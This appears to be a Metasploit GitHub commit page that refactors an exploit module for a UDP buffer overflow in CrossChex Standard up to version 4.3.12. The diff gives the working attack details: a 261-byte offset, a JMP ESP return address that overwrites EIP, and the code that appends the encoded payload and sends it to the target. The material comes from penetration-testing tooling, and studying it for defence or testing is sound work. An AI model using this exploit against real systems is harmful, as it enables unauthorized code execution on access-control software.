Land #12902, Add exploit module for crosschex buffer overflow

rapid7 · Feb 13, 2020 · 07954c0 · 07954c0
2 parents 0e55e20 + 2ca2b5c
commit 07954c0
Showing 1 changed file with 8 additions and 4 deletions.
diff --git a/modules/exploits/windows/misc/crosschex_device_bof.rb b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -44,7 +44,11 @@ def initialize(info = {})
           [
             [
               'Crosschex Standard x86 <= V4.3.12',
-              {}
+              {
+                  'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
+                  'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+                  'Shift' => 4 # Positions payload to be written at beginning of ESP
+              }
             ]
           ],
       'DefaultTarget'  => 0
@@ -67,9 +71,9 @@ def exploit
     end
 
     print_status "CrossChex broadcast received, sending payload in response"
-    sploit = rand_text_english(261)
-    sploit << "\x07\x18\x42\x00" # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
-    sploit << rand_text_english(4) # Positions payload to be written at beginning of ESP
+    sploit = rand_text_english(target['Offset'])
+    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
+    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
     sploit << payload.encoded
 
     udp_sock.sendto(sploit, host, port)